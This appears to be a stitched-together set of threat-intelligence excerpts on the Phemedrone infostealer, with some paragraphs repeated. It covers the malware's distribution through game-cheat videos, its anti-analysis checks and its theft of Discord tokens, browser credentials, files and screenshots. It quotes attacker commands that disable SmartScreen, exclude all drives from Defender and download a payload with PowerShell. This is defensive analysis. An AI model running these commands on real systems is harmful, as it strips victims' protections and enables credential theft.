Phemedrone

Gather Victim Network Information - T1590.005 7 out of the 17 malware families analyzed by STRT were observed collecting network-related information, such as the public IP address, geographic location, and other metadata, by querying external IP-lookup web services.

The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it.

Its only purpose was to download another password-protected archive via PowerShell... Following that, start.bat would use PowerShell to launch the executable files from the archive.

Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder... Following that, start.bat would use PowerShell to launch the executable files from the archive.

reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" / v "EnableWebContentEvaluation" / t REG_DWORD / d 0 / f reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" / v "SmartScreenEnabled" / t REG_SZ / d "Off" / f

Multiple families have successfully bypassed App-Bound Encryption including Phemedrone, LummaC2, Meduza, Vidar, StealC, Rhadamanthys, WhiteSnake, Meta, and Lumar.

They started distributing malware under the guise of restriction bypass programs and injecting malicious code into existing programs.

Phemedrone contains several anti-analysis checks which can be enabled during the build phase of the malware. If any of the checks described below are successful, Phemedrone exits.

Anti-VM Phemedrone’s anti-VM check checks the victim’s computer for the following virtual machine (VM) strings, which indicate that Phemedrone is being run in a VM.

Anti-debugger Phemedrone’s anti-debugger check checks the victim’s environment for the following processes, which may indicate that Phemedrone is being debugged.

reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" / v "EnableWebContentEvaluation" / t REG_DWORD / d 0 / f reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" / v "SmartScreenEnabled" / t REG_SZ / d "Off" / f

Phemedrone will target Discord tokens by accessing the Discord leveldb database, stored on a victim’s computer. It will then regex for “dQw4w9WgXcQdQw4w9WgXcQ:[^\”]*”, which it will use to extract the victim’s Discord token for authentication purposes.

Phemedrone steals data from the internal Chromium/Firefox storage databases that store passwords, credit cards, cookies, and more.

Phemedrone accesses a variety of Chromium and Firefox/Gecko based browsers in order to steal data from them. Phemedrone steals data from the internal Chromium/Firefox storage databases that store passwords, credit cards, cookies, and more.

Phemedrone contains several anti-analysis checks which can be enabled during the build phase of the malware. If any of the checks described below are successful, Phemedrone exits.

Anti-VM Phemedrone’s anti-VM check checks the victim’s computer for the following virtual machine (VM) strings, which indicate that Phemedrone is being run in a VM.

CIS check Phemedrone has a check that checks if a victim is a speaker of the following languages spoken in Commonwealth of Independent States (CIS) countries, by using a keyboard language check.

Anti-debugger Phemedrone’s anti-debugger check checks the victim’s environment for the following processes, which may indicate that Phemedrone is being debugged.

Phemedrone also includes a basic filegrabber, which will iterate through My Documents and Desktop and steal all files based on config supplied max file size and directory depth.

Phemedrone will automatically obtain a screenshot of the victim’s screen post installation for exfiltration.

The videos were frequently accompanied by a link to an archive and a password to unlock it... download another password-protected archive via PowerShell, and unpack that with UnRAR.exe

Phemedrone’s gate sender allows actors using Phemedrone to specify a C2 that hosts the Phemedrone gate.php script. Bots that connect to this php gate will send their logs there.

Its only purpose was to download another password-protected archive via PowerShell... powershell - Command "(New-Object Net.WebClient).DownloadFile('https://www.dropbox.com/.../black.rar?...', 'C:\Users\<redacted>\AppData\Local\Temp\black.rar')"

Phemedrone’s Telegram sender allows actors to specify a Telegram channel/telegram bot as the preferred destination for exfiltrated logs.

While doing so, it added every drive root folder to SmartScreen filter exceptions. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys... to disable SmartScreen altogether.

powershell - Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"